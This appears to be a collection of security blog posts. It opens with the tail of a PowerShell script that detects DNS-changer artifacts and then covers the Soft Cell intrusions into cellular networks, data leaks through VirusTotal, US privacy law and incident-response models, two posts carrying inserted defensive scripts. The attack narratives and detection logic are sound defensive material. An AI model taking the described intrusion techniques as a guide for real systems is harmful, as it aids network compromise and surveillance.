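# 5. Firefox: a user.js in any profile that sets security.enterprise_roots.enabled to
#    true makes Firefox trust the Windows root store, and with it the added certificate.
Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue | ForEach-Object {
    $profiles = Join-Path $_.FullName 'AppData\Roaming\Mozilla\Firefox\Profiles'
    if (Test-Path $profiles) {
        Get-ChildItem -Path $profiles -Filter user.js -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            if (Select-String -Path $_.FullName -Pattern 'security\.enterprise_roots\.enabled"\s*,\s*true' -Quiet) {
                $findings.Add("Firefox: $($_.FullName) enables security.enterprise_roots.enabled")
            }
        }
    }
}

if ($findings.Count -eq 0) { 'No Extenbro-style artifacts found.' } else { $findings }
```

The script only reports; fix the DNS servers by hand as described above and do not reboot until the Scheduled Task is gone. Get-DnsClientServerAddress and Get-ScheduledTask require Windows 8 / Server 2012 or later.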

Should you need further help, feel free to reach out to us on the forums or by contacting our support department.


DNS servers:


SHA256 b2a28e9abb04a5926d53850623b1f3c6738169b27847e90c55119f2836c17006

Root certificate:


Stay safe, everyone!

A week in security (July 8 – 14)

Last week on Malwarebytes Labs, we looked at ways to send your sensitive information in a secure fashion, examined some tactics in incident response land, and explored federal data privacy law. We also looked at how security tools can turn against you, and took a deep dive into the rather fiendish Soft Cell attack.

Other cybersecurity news

  • The UK government backs facial recognition tech: The controversial trials received the backing of the British government’s home secretary. (Source: BBC)
  • Who watches the Watchmen: British police officer misuses database. (Source: The Register)
  • Zoom zero-day lurches into view: Researchers report a bug which leaves Mac users susceptible to webcam hijacks. (Source: ThreatPost)
  • Listen closely: Google contractors can listen to Google Home audio clips. (Source: Sophos’s Naked Security Blog)
  • Agent Smith on the prowl: Android malware capable of replacing code with its own malicious wares found on more than 25 million devices. (Source: The Verge)
  • TrickBot is what’s hot: The timeless “classic” returns with a few new tricks up its sleeve, including some cunning spam antics. (Source: TechCrunch)
  • Pale Moon rising: Old versions of the popular browser found to be infected with malware. (Source: ZDNet)
  • Phish attacks are never far: A recent study revealed that one in 99 emails are classified as phishing. Here’s a good look at costs and some additional statistics. (Source: Small Business Trends)
  • Beware of whales: Ship operators are warned by the US coast guard to be on the lookout for targeted spear phishing attempts. (Source: Computing News)
  • Amazon is a Prime target: Beware of smart phishing scams looking to bait those looking for a bargain on Prime Day. (Source: Wired)

Stay safe, everyone!

Cellular networks under fire from Soft Cell attacks

We place a lot of trust in our mobile experience, given that our phones are among the most constant companions we have. Huge reams of data, tied to a device we always carry with us, with said device frequently offering additional built-in app functionality. An astonishing wealth of information, for anyone bold enough to try and take it.

Security firm Cybereason uncovered an astonishing attack dubbed “Operation Soft Cell” haunting at least ten cellular networks based around the globe. Over the course of seven years, the attackers went after all manner of detailed information on just 20 to 30 targets, feeding it back to base and building up an amazingly detailed picture of their daily dealings.

What happened here?

The compromise, which the researchers have given a high probability of being a nation-state attack, went to elaborate lengths to nab its high-value targets. Attackers first gained a foothold by targeting a web-connected server and making use of an exploit to gain access. A shell would then be placed to enable further unauthorised activity.

In this particular case, a modified version of the well-known China Chopper was deployed to carry out specific tasks. It’s quite flexible, able to run on multiple server platforms. It’s also quite old, dating back several years. I guess there’s no tunes quite like the classics.

Thanks to China Chopper and a variety of alternative compromise tools, the attackers would make use of credentials from the first machine to dig deeper in the network. Well-worn RATs like PoisonIvy were used to ensure continued access on compromised devices.

Eventually, they’d gain control of the Domain Controller and at that point, it’s essentially game over for the targeted organisation.

Groundhog Day

It appears the criminals reused the same techniques to work their way around the various cellular networks, with little resistance. Talk about “If it ain’t broke, don’t fix it.” So total was their ownership of certain organisations, they were able to set up VPN services to enable quick, persistent access on hijacked networks instead of taking the much slower route and connecting their way through multiple compromised servers.

If they were worried about being caught in the act, they certainly didn’t show it. In fact, from reading the main report it seems in cases where there was some pushback, they simply looped back around and tried again till they succeeded, attacking in waves staggered over a period of months.

The Crown Jewels

Most of the time, attacks on web-facing servers result in an email from Have I Been Pwned and you see which bits of personal information have been fired across the web this time. Not here, however—it was never going to end with a username/password dump.

The attackers plundered the cellular networks and gained access to pretty much everything you could think of. In cases where the target was fully compromised, all usernames and passwords were grabbed, along with billing information and various smatterings of personal data.

However, the big prize here wasn’t being able to hurl all of this onto a Pastebin or upload it to social media as a free-for-all; nothing so bland. It was, instead, being able to sit quietly on both this data and hundreds of gigabytes of call detail records. This is, as you’ll see, a bad thing.

Call detail records: What are they?

Good question.

Call detail records are all about metadata. They won’t give you the contents of the call itself, but what they will give you is pretty much everything else. They’re useful for a variety of things: billing disputes, law enforcement inquiries, tracking people down, bill generation, call volumes/handling for businesses and much more. Not only do they avoid recordings of conversations, they also steer clear of specific location information.

Nonetheless, patterns of behaviour are easy to figure out. A typical CDR could include:

  • Caller
  • Recipient
  • Start/end time of call
  • Billing number
  • Voice/SMS/other
  • A specific number used to identify the record in question
  • How the call entered/exited the exchange

If you’re looking to target specific individuals, then this data over time is an incredible resource for an attacker to get hold of. Some may prefer the old spear phish/malware attachment type scenario, but by going after the target directly, it’s quite possible someone’s going to find out. Where targets are high value, they’ll almost certainly have additional security measures in place. For example, journalists who cover human rights abuses in dangerous parts of the world will often work with organisations who keep an eye out for potential attacks.

This method, aimed at slowly digging around behind the scenes and out of view from whoever happens to be using those networks, is much sneakier. Depending on how things pan out, it’s entirely possible they’d never even know they’d been compromised by proxy in the first place.

Hidden in plain sight

With methods such as this, the people behind the malware daisy chain have an amazing slice of access to the individual with no direct specific risk. Everything at that point comes down to how well the cellular network is locked down, how good their security is, how on the ball their incident response team happens to be, and so on.

If (say) they failed to spot numerous attacks, left vulnerable servers online, missed telltale signs that something is amiss, let well-known RATs like PoisonIvy dance across their network, allowed the hackers to set up a bunch of VPN nodes…well, you can see where I’m going with this.

Where I’m going is several years later and a large slice of “Oh dear.”


Well, first things first: don’t panic. It’s worth noting there isn’t any additional verification (yet) outside the initial threat report. Something bad has clearly happened here, but as to how severe it is, we’ll leave that to others to debate.

Whether this was pulled off by a high-level, nation-state-approved group of attackers or a random collection of bored people in an apartment, one way or another those cell networks really had a number done on them. The impact to the individuals caught by this is the same, and one assumes they’ve been informed and taken appropriate action. We can only hope the cellular networks impacted have now taken appropriate measures and shored up their defences.

Caution: Misuse of security tools can turn against you

We have a saying in Greece: “They assigned the wolf to watch over the sheep.”

In a security context, this is a word of caution about making sure the tools we use to keep our information private don’t actually cause the data leaks themselves. In this article, I will be talking about some cases that I have come across in which security tools have leaked data they were intended to secure.

The VirusTotal problem

VirusTotal (VT) is a multi-scanner in which an individual researcher is free to upload any file they believe is suspicious. They can then view results from many antivirus (AV) products as to whether or not the file is considered malware. While this is an amazing service which I am certain everyone in the infosec world uses regularly, its usage needs to be carefully thought over.

What some people don’t realize is that every file you submit to VirusTotal gets saved on VT’s servers and is fully searchable. By using an internal VT tool called Malware RetroHunting, malware hunters have the ability to search for text and binary patterns in order to find malware similar to the samples they may be analyzing or tracking.

This is a great feature, but as you can imagine, just as someone could search for [insert malicious string of your choice], they could just as easily search for “Account Number:”, which might result in loads of documents containing such data. It is important to bring awareness to this fact so that people can properly use this tool without risking their private data.

I will go through a few cases showing the misuse of VirusTotal to serve as a warning for users who might be thinking about using either second-rate or unofficial tools, or adopting practices built off of VT.

Case 1: The no AV argument

I far too often hear people saying something like this: “I don’t need an antivirus. I send files to VT for free when they look suspicious.”

I think it should be quite obvious why this method is flawed. If you submit all documents you receive to VT, then you run the risk of leaking private information, as stated above. Now, if you exclude scanning of documents from specific “trusted” addresses (in order to not leak confidential data), then you run the risk of getting malware phished to you from a spoofed contact. Needless to say, this is not a safe way to keep yourself protected.

Case 2: API usage

The use of VirusTotal API can also be dangerous. Bugs in the code or logic can easily cause a mass upload of private files. This is a danger whether you are building your own tools or using tools like WINJA, which automate submission of files to VT. The only recommendation here is to make sure the tools you are using are reputable or you have done your own independent code audits to make sure no bugs may lead to data leakage.

When it comes to using other reputable security tools, it is wise to read over all of the documentation and make sure you understand how and when the given tool will incorporate VT.

Case 3: VT email scanning service

I have unfortunately seen many articles and forum posts online where people have been giving advice to use the VT attachment scan service. Basically, by sending an email attachment to the service, the sender can receive a response as to what VT found regarding the attachment.

Please do not take such advice unless you are sure the document you are scanning contains no private data. It is a risky game. If you are worried about malicious documents infecting your computer, then the logical conclusion would be to buy an antivirus with a good reputation and the technology to block malicious documents.

If you choose to send all your potentially private emails to VT, searchable by anyone, then you’re essentially undoing any potential security or privacy benefits by exposing all your data anyway. What damage is spyware going to do when you’ve already sent your sensitive data out to a public database?

EXE files problem

The next case I want to talk about, while less sensitive, is a lot more likely to be overlooked.

In a corporate environment, we cannot rely on everyone to manually submit attachments or files to security engineers—all of this is automated. From my past experience and from speaking with fellow security engineers, I have seen that it is quite common for all executables entering a corporate network to automatically get scanned with various plugins tied to a given platform. I will highlight Carbon Black, an enterprise antivirus program, in this case, although many other security providers have this problem as well.

When a new exe makes its way into a network, Carbon Black stores it, but also has the ability to cross-reference the given file with various plugins and tools that are built in or added to the platform. For example, you can click a bubble on any given file in your network, which will give you its results against the WildFire sandbox. And of course, the topic that has received so much heat in the media this year—the VT plugin.

Now, while they have fixed the issues on submitting documents to avoid leaking data, they still do submit exes. But wait, so what? Isn’t that exactly what we want it to do?

Correct, it is. Automation is what every corporation aims for in its security infrastructure. There is nothing wrong with the root idea of submitting and scanning exes flowing through the network. However, automation sometimes comes with a tradeoff if not properly planned.

I have evaluated the security infrastructure of many corporate networks and in these evaluations, I have seen that in this attempt to scan all new exes for malware, the company’s in-house executables end up getting scanned as well.

So now, confidential exes are unknowingly being exposed and leaking arguably more sensitive data and intellectual property. In addition, think for a moment about how software developers typically code. While they are testing functionality, it is common for a developer to hard code some credentials, paths, or other revealing information for a test build. Sure, after they are done, for the production build, it will likely get changed to hide this information and make it dynamic, but in the meantime, these demo builds have been picked up by the EDR and scanned through various plugins.

Again, this is not a problem with the EDR itself, it is a problem with its implementation, entirely the responsibility of the customer using the software.

Remediation and prevention

Now this does not mean we need to abandon use of security tools for fear of data leaks; it simply means we need to make some adjustments. So what can a business do to protect against leaking their own data to the public?

There are many options which will depend upon the compliance requirements and needs of a given company, but I have a few base considerations I recommend.

Rules-based segmentation

Rather than having a blanket automation where everything is automatically scanned, I always recommend segmenting the actions taken when the EDR sees a new file based on user groups. For example, maybe users in the developers’ group do not have their binaries residing in a specific directory sent for auto scanning.

However, this is easier said than done, because simply enabling this type of rule can be catastrophic and may essentially give a developer free rein to secretly develop malware. That’s why, when one security rule is relaxed for a given user, another rule must be tightened to make up for it. In this theoretical scenario, we have just given a developer a free pass to not have his executables scanned: we have closed one door but opened another.

To make up for this, one thought might be to keep heavy watch on the IPs and ports that the dev machines are allowed to communicate over. If the developer needs to communicate with a specific IP for his software, he should get approval in advance from the security engineers. At this point, we can let the developer go ahead and create malware, but if his MAC address or IP is seen attempting communication with a non-pre-approved IP or over a non-pre-approved port, fire alerts. This type of rule is trivial to create using a good EDR platform.

The roles and expected behavior of a given employee’s machine must be fully understood beforehand to be able to keep proper control over a network.
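Case 2 above warns that a home-grown VT tool can mass-upload private files, and the EXE section shows how in-house binaries end up in a public database. The following added example (not code from the post, from VirusTotal or from Carbon Black) is the shape of a tool that avoids both: it only ever sends a SHA-256 for lookup, and it skips binaries that are in-house by location or by code-signing publisher. The publisher subject and developer paths are placeholders; the endpoint is VirusTotal's API v3 "GET /api/v3/files/{sha256}".

```powershell
# Added example (not the post's, VirusTotal's or Carbon Black's code): a hash-first
# VirusTotal check. Only a SHA-256 leaves the network; there is deliberately no code
# path that uploads file content. Placeholders to adapt: $InHousePublishers, $DevPaths.

$InHousePublishers = @('CN=Example Corp Code Signing, O=Example Corp')   # placeholder signer subjects
$DevPaths          = @('C:\Dev\*', 'C:\Users\*\source\*')                # placeholder developer trees

function Test-InHouseBinary {
    param([Parameter(Mandatory)][string]$Path)
    # Location rule: anything under a developer tree stays local (the "segmentation" idea above).
    foreach ($pattern in $DevPaths) { if ($Path -like $pattern) { return $true } }
    # Signature rule: a valid Authenticode signature from our own publisher stays local.
    $sig = Get-AuthenticodeSignature -FilePath $Path
    if ($sig.Status -eq 'Valid' -and $InHousePublishers -contains $sig.SignerCertificate.Subject) {
        return $true
    }
    return $false
}

function Get-VtVerdictByHash {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$ApiKey
    )
    if (Test-InHouseBinary -Path $Path) {
        return [pscustomobject]@{ Path = $Path; Action = 'skipped: in-house binary'; Malicious = $null }
    }
    # Only the hash is sent. Get-FileHash reads the file locally; nothing is POSTed.
    $sha256 = (Get-FileHash -Path $Path -Algorithm SHA256).Hash.ToLower()
    try {
        $resp  = Invoke-RestMethod -Method Get -Uri "https://www.virustotal.com/api/v3/files/$sha256" `
                                   -Headers @{ 'x-apikey' = $ApiKey }
        $stats = $resp.data.attributes.last_analysis_stats
        return [pscustomobject]@{ Path = $Path; Action = 'hash lookup'; Malicious = $stats.malicious }
    } catch {
        # 404 means VT has never seen this hash. This is exactly where a careless tool
        # would fall back to uploading the file; this one hands it to a human instead.
        if ($_.Exception.Response -and [int]$_.Exception.Response.StatusCode -eq 404) {
            return [pscustomobject]@{ Path = $Path; Action = 'unknown to VT: triage manually, do not upload'; Malicious = $null }
        }
        throw
    }
}

# Usage (API key read from the environment, never hard-coded):
# Get-ChildItem C:\Quarantine\*.exe | ForEach-Object { Get-VtVerdictByHash -Path $_.FullName -ApiKey $env:VT_API_KEY }
```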

Understand the tools you use

It is important to understand that security tools are made for generic use. The creators do not know specifically what your company does and what your privacy policies are. They do not know whether you will be developing your own software onsite or whether you are simply using the tool to scan downloaded files.

That being said, it is up to you, the user or security engineer in charge of evaluating, to make sure you understand all of the functionality and options a tool gives you.

A developer who creates a tool to scan email attachments automatically with VT is not necessarily acting maliciously. For some users, maybe a user who specifically does not create and store info in documents, this might be the best tool in the world, exactly what they need to automate their operations. For another company who sends their contracts in the form of Word documents, this might be catastrophic. At the end of the day, the responsibility cannot be blamed on the tool that behaved exactly as advertised. It’s up to the user to do her own research and understand what the tool does and how it will affect privacy and security.

What should a US federal data privacy law ideally include?

In the constant David-and-Goliath struggle between digital privacy advocates and corporate privacy invaders, the question of how to legally protect Americans with a comprehensive, federal data privacy law provides conflicting answers. Advocates want protections, which Big Tech interprets as restrictions.

As of today, there is no one digital privacy law to rule them all. While a few state laws exist that protect consumer privacy here in the US, overarching federal legislation, such as the General Data Protection Regulation (GDPR) in Europe, has not yet penetrated the market.

US-based corporations must comply with GDPR if they have a global presence, but that’s only for their European customers—and many have found convenient workarounds. Who will protect the American user? Smaller tech? Privacy-forward tech? What about we-don’t-have-a-lobbying-war-chest tech? How do they feel about a federal privacy law?

For months, Malwarebytes Labs has reported on data privacy laws in the United States and abroad. But the question of federal legislation that applies to the entire country has gone unanswered, as multiple Senate proposals have yet to move forward.

Further, despite Big Tech’s recently-avowed commitment to regulation, those same companies are reportedly funding efforts to dismantle newly-enacted stateside data privacy protections.

But earlier this year, a group of tech companies stood opposed. They wanted to strengthen one of those same privacy protections. This tech group included some of the most recognizable company names in user privacy: DuckDuckGo, Ghostery, ProtonMail, Lavabit, Brave, Vivaldi, Purism, and Disconnect.

We asked those companies to broaden their sights beyond state legislation. What did they want, if anything, from a federal data privacy law for the United States?

What’s the goal?

For many of these privacy-forward companies, a federal data privacy law would be far from restrictive. Instead, it is considered necessary.

Todd Weaver is the founder and chief executive of Purism. He supports a federal data privacy law, so long as it isn’t stripped of meaningful user protections and doesn’t create barriers to success for startups and mid-sized companies. Federal legislation could be, Weaver said, the one way to finally defend the public from an ongoing digital privacy crisis.

“We’re talking about the exploitation of people in the digital world, and this is a giant problem,” Weaver said. He continued:

“The problem can be boiled down to things that nobody should ever know. Those are where people are, what people do, and who talks to whom.”

In the US, those pieces of information are far from protected, though. Where we are, what we do, and who we talk to fuels a massive corporate surveillance machine driven by social media behemoths, aggressive online tracking, and unseen data brokers, all motivated by continuously-climbing advertising revenue. No current law forbids much of this.

So how do we fix it? Here are a few ideas from privacy advocates.

Like the CCPA…but better

Last year, California’s then-governor Jerry Brown signed the California Consumer Privacy Act (CCPA). Effective January 1, 2020, the CCPA grants Californians the rights to know what data is collected on them, whether that data is sold, the option to opt out of those sales, and the right to access that data.

In April, privacy search engine DuckDuckGo, joined by 23 other technology companies, sent a letter to the California Assembly’s Privacy Committee asking that the law be bolstered. The requested improvements, DuckDuckGo wrote, would include the right to opt out of having information shared—not just sold—and the right to sue companies that violated any privacy provision of the CCPA.

Helen Horstmann-Allen, chief operating officer at email provider Fastmail (which signed onto DuckDuckGo’s letter) said she would appreciate seeing legislation similar to CCPA go national.

“We were pleased to see California take the lead with their privacy laws to reflect how companies do business today. Expanding the scope of privacy legislation recognizes that companies don’t need to sell data to violate consumer privacy,” Horstmann-Allen said. “We’d love to see this type of legislation move on the national level as well. Privacy rights shouldn’t end at the state line.”

Jeremy Tillman, director of product at the ad-blocking browser extension Ghostery, made similar comments in a 2018 opinion piece for The Hill:

“If there is serious traction for federal consumer privacy legislation, which there absolutely should be, the California Consumer Protection law can serve as a solid template to model future laws after.”

A consumer’s right to sue for privacy violations

California’s privacy law received a major setback this year when a proposed amendment did not pass one of the state’s Senate committees. The amendment, SB 561, would have given Californians the right to sue a company that violated any privacy rights described in the CCPA.

Currently, CCPA only gives Californians the right to sue a company for the harm of a data breach. Though a novel inclusion when compared to the dearth of privacy protections across the nation, some argue that broader opportunities to go to court are needed.  

“If you can’t sue or do anything to go after these companies that are committing these atrocities, where does that leave us?” Weaver said. “We’ve already seen that with the CCPA in California.”

At least 40 bills have been introduced in California with the near-uniform purpose to amend the CCPA into a weaker version of itself. AB 846, for example, would have limited the CCPA’s discrimination prohibition. AB 873 would have pared down the definition of individuals’ personal information.

More attempts to weaken the CCPA remain, Weaver said.

“One of those bills is just about defanging the entire regulation,” Weaver said. “If you do that, if you defang, [the law] is just paper.”

Transparent data collection practices

Ghostery’s Tillman echoed the above sentiments that any federal data privacy legislation should “hold big tech accountable for their deceptive data collection practices,” but he added:

“[It] should require that any data collection occur as part of a transparent, easy-to-understand transaction where the cost to consumers is clear, enabling them to be knowing and voluntary participants in an ad-supported and data-driven economy.”

Design for interoperability with GDPR

Johnny Ryan, chief policy officer for the privacy-focused web browser Brave, testified earlier this year before the US Senate Judiciary Committee about a potential federal data privacy law. Such a law, Ryan said, should hew closely to the standards of a popular, across-the-pond framework: the European Union’s General Data Protection Regulation (GDPR).

“We view the GDPR as essential,” Ryan said in an email to Malwarebytes Labs. “It can establish the conditions to allow young, innovative companies like ours to flourish.”

Ryan told the committee that two elements within the GDPR can help both protect Americans’ data and give opportunities for small companies to meaningfully compete with Silicon Valley’s biggest, most entrenched businesses. Those two provisions are the “purpose limitation” principle—which protects people’s data from being used in ways they could not anticipate—and the ability to easily opt out of a company’s data collection.

“These two GDPR tools, the ‘purpose limitation principle’, plus the ease of withdrawal of consent, enable freedom,” Ryan told the committee. “Freedom for the market of users to softly ‘break up’—and ‘un-break up’—big tech companies by deciding what personal data can be used for.”

Further, Ryan said to Malwarebytes Labs, a US federal data privacy law inspired by GDPR—particularly in defining concepts like personal data, opt-in consent, and profiling—will provide technology companies with a streamlined path toward compliance, since many have already worked toward complying with GDPR.

“The standard of protection in a federal privacy law, and the definition of key concepts and tools in it, should therefore be compatible and interoperable with the emerging GDPR de facto standard that is being adopted globally,” Ryan said.

Do not undermine states’ individual data privacy laws

Ever since Americans learned about a European consultancy’s effort to sway the 2016 US Presidential election by harvesting the Facebook data of tens of millions of non-consenting users, individual US states have clamped down hard on data misuse against their residents.

California passed the CCPA. Vermont passed a law regulating data brokers. Maine passed a law placing restrictions on how Internet service providers share Mainers’ personal information.

But those state laws could be in trouble if a federal data privacy law calls for their nullification. Such a provision exists in both Senator Marco Rubio’s data privacy bill and in the draft privacy legislation written by Center for Democracy and Technology.

This superseding provision—called “pre-emption”—is unacceptable to Brave.

“The federal law should be of equal or higher standard to state laws, and should not undermine state laws,” Ryan said.

A “Digital Bill of Rights”

When explaining what he would like to see in a federal privacy bill, Weaver repeatedly returned to the idea of a “Digital Bill of Rights.” It is an idea his company has already acted on, having written out and implemented several of the principles.

Included in the company’s Digital Bill of Rights are:

  • The right to change providers
    • Users can take all their data and move it to another service
  • The right to protect personal data
    • Users “own and control” the master keys to encrypt their data
  • The right to verify
    • Users can analyze the source code of software operating locally on their machines
  • The right to not be tracked
    • Users know about and have access to all the collections and uses of their data
    • Users can “obtain, correct, or permanently delete personal data”
    • User data that is collected for a purpose is deleted after that purpose is fulfilled
  • The right to access
    • Users will not be “discriminated against nor exploited based on personal data”

A digital bill of rights is a rare find for any technology company, but Weaver explained that Purism is not guided by the same rules as Big Tech. Because Purism has incorporated as a “social purpose company,” it is not obliged to maximize shareholder value; instead, it is obliged to fulfill the principles written in its articles of incorporation.

Those “Purist Principles,” Weaver explained, guide the company every day.

“It allows everyone, including me, our employees, to advance our causes before caring about profits or maximizing shareholder value,” Weaver said.

One last, important aspect about the rights described in the Purist Principles is that none of them can be removed by a company’s terms of service.

“If this was established at the federal level,” Weaver said, “this is saying ‘These are your rights, and nobody can remove these rights inside a Terms of Service [agreement] that nobody reads.’”

The post What should a US federal data privacy law ideally include? appeared first on Malwarebytes Labs.

Enterprise incident response: getting ahead of the wave

Enterprise defenders have a tough job. In contrast to small businesses, large enterprises can have thousands of endpoints, legacy hardware inherited from mergers and acquisitions, and legacy apps that are business critical and prevent timely patching. Add to that a deluge of indicators and metadata from the perimeter that may represent the early stages of a devastating attack—or may be nothing at all.

So how do network defenders get out from behind the 8-ball? How do leaders bring an effective strategy to bear in mobilizing incident response (IR) resources? To deal with knotty problems like this, security researchers have developed a number of IR models to help bring a maximally sane, efficient strategy to network defense efforts.

The cyber kill chain

In 2011, Lockheed Martin developed the cyber kill chain. Borrowed from the US military, the kill chain breaks most cyberattacks down into seven sequential phases (reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives) and holds that forcing a hard stop at any one of them prevents the attack as a whole. So if an attack is caught at the installation phase and remediated, the attacker can no longer proceed to act on objectives. If endpoint protection can stop the attack earlier, at the delivery phase, so much the better.

The general idea that makes the kill chain such an appealing way of looking at an attack is that you can’t block everything. Malspam will get through perimeter defenses. Reconnaissance will sometimes happen whether you like it or not. Exploitation will definitely happen with that one employee who is committed to clicking on everything.

So rather than throwing up a Maginot Line of ever-increasing defenses at ever-escalating costs, the kill chain suggests that defenders have seven opportunities to shut down an attack, and can fight on a battlefield of their choosing. While it would be best to identify an attack at the reconnaissance phase, killing it at the delivery phase can keep the network just as safe, without burning out your SOC by expecting them to catch everything. Check out some more details on how the kill chain is implemented here.

The ATT&CK model

A somewhat more granular model, MITRE ATT&CK is a matrix that maps a lengthy list of attacker techniques (the “how”) to 12 tactics (the “why”), laid out in rough attack-chain order from initial access through to impact. Often seen as a complement to the kill chain, mapping TTPs already observed in your environment onto ATT&CK tactics can be a useful exercise for determining defense priorities. When looking at use cases for the model, threat data sharing is one of the most useful: a filled-in matrix of observed TTPs is a quick way to share a snapshot of the threat landscape across multiple defensive groups or different organizations.

Critiques of IR models

Most critiques of the kill chain and its more recent variants boil down to “what about X?” This is a little bit misguided, as attacker capabilities change over time, and a comprehensive matrix of TTPs would be exhausting to look at, and probably inaccurate in some way. What these models are really meant to assist with is bringing threat intelligence and strategy into the SOC to eliminate blind reactivity. Using any strategic model at all can bring better results than blind monitoring.

Intelligence: the bigger point

The takeaway for the SOC leader or CISO looking to implement an IR model is not picking the one, singularly correct model. Rather, implementing strategic defense in any form can boost the SOC’s responsiveness, efficiency, and accuracy. Having a well-mapped matrix tying observed indicators to specific attack phases can be an aid in prioritizing responses, as well as judging severity for a successful attack caught midstream.

Most importantly, having an incident response model forces SOC staff to respond to an incident in a strategic manner: addressing the threats furthest along the attack chain first, and using the stage a threat has reached to derive intelligence on potential ongoing attacks. As with conventional warfare, beating back attacks and winning the war depends on having a plan.
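The two uses of a model described above, a shareable matrix snapshot of observed TTPs (the ATT&CK section) and a triage order that handles the host furthest along the chain first (the two paragraphs just above), can both be driven from the same alert data. The following is an added example, not code from Malwarebytes or MITRE. It assumes alerts already carry an ATT&CK technique ID and the tactic the detection rule was written for, uses the 12-tactic Enterprise ATT&CK layout the post refers to as the chain ordering, and runs over a handful of constructed sample alerts.

```python
from collections import defaultdict
from dataclasses import dataclass

# Enterprise ATT&CK tactics in matrix order (the 12-tactic layout current when
# this post was written). Position in this list is the "how far along" score.
TACTICS = [
    "initial-access", "execution", "persistence", "privilege-escalation",
    "defense-evasion", "credential-access", "discovery", "lateral-movement",
    "collection", "command-and-control", "exfiltration", "impact",
]
TACTIC_INDEX = {t: i for i, t in enumerate(TACTICS)}


@dataclass(frozen=True)
class Alert:
    host: str
    technique: str   # ATT&CK technique ID the detection rule is tagged with
    tactic: str      # ATT&CK tactic the rule was written for
    detail: str      # free-text summary from the detection


# Constructed sample alerts (hostnames and details are made up for the example).
SAMPLE_ALERTS = [
    Alert("ws-017", "T1566", "initial-access", "macro-laden attachment opened"),
    Alert("ws-017", "T1059", "execution", "encoded PowerShell spawned by winword.exe"),
    Alert("ws-042", "T1566", "initial-access", "phishing URL clicked, no follow-on"),
    Alert("srv-db-01", "T1021", "lateral-movement", "RDP logon from ws-017"),
    Alert("srv-db-01", "T1003", "credential-access", "lsass.exe memory read"),
    Alert("srv-db-01", "T1071", "command-and-control", "beacon to unknown host, 60s interval"),
]


def _check_tactic(alert):
    # A rule tagged with a tactic outside the matrix would silently sort to the
    # bottom; fail loudly instead so the rule gets fixed.
    if alert.tactic not in TACTIC_INDEX:
        raise ValueError(f"unknown tactic {alert.tactic!r} on {alert.host}")


def furthest_stage(alerts):
    """Per host: (furthest tactic reached, the alert that got it there)."""
    stage = {}
    for a in alerts:
        _check_tactic(a)
        idx = TACTIC_INDEX[a.tactic]
        if a.host not in stage or idx > stage[a.host][0]:
            stage[a.host] = (idx, a)
    return {h: (TACTICS[i], a) for h, (i, a) in stage.items()}


def triage_order(alerts):
    """Hosts sorted so the one furthest along the chain is handled first.

    Ties are broken by how many distinct tactics were seen on the host
    (a broader footprint suggests a real intrusion rather than a single
    false positive), then by hostname for a stable order."""
    stage = furthest_stage(alerts)
    tactics_hit = defaultdict(set)
    for a in alerts:
        tactics_hit[a.host].add(a.tactic)
    return sorted(
        stage,
        key=lambda h: (-TACTIC_INDEX[stage[h][0]], -len(tactics_hit[h]), h),
    )


def matrix_snapshot(alerts):
    """Tactic -> sorted technique IDs observed. Every tactic is present, so an
    empty list is a visible gap: either nothing happened there or nothing is
    instrumented to see it, which is exactly what a sharing partner wants to know."""
    seen = {t: set() for t in TACTICS}
    for a in alerts:
        _check_tactic(a)
        seen[a.tactic].add(a.technique)
    return {t: sorted(ids) for t, ids in seen.items()}


if __name__ == "__main__":
    for host in triage_order(SAMPLE_ALERTS):
        tactic, alert = furthest_stage(SAMPLE_ALERTS)[host]
        print(f"{host:<10} {tactic:<20} {alert.technique} {alert.detail}")
    print()
    for tactic, ids in matrix_snapshot(SAMPLE_ALERTS).items():
        print(f"{tactic:<22} {', '.join(ids) or '-'}")
```

On the sample data the database server comes first because it has reached command and control, the workstation that spawned PowerShell second, and the host that only clicked a link last. The snapshot is what you would hand to another team: a list of tactic-to-technique observations with no hostnames or raw indicators in it.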

Stay vigilant, and stay safe.

The post Enterprise incident response: getting ahead of the wave appeared first on Malwarebytes Labs.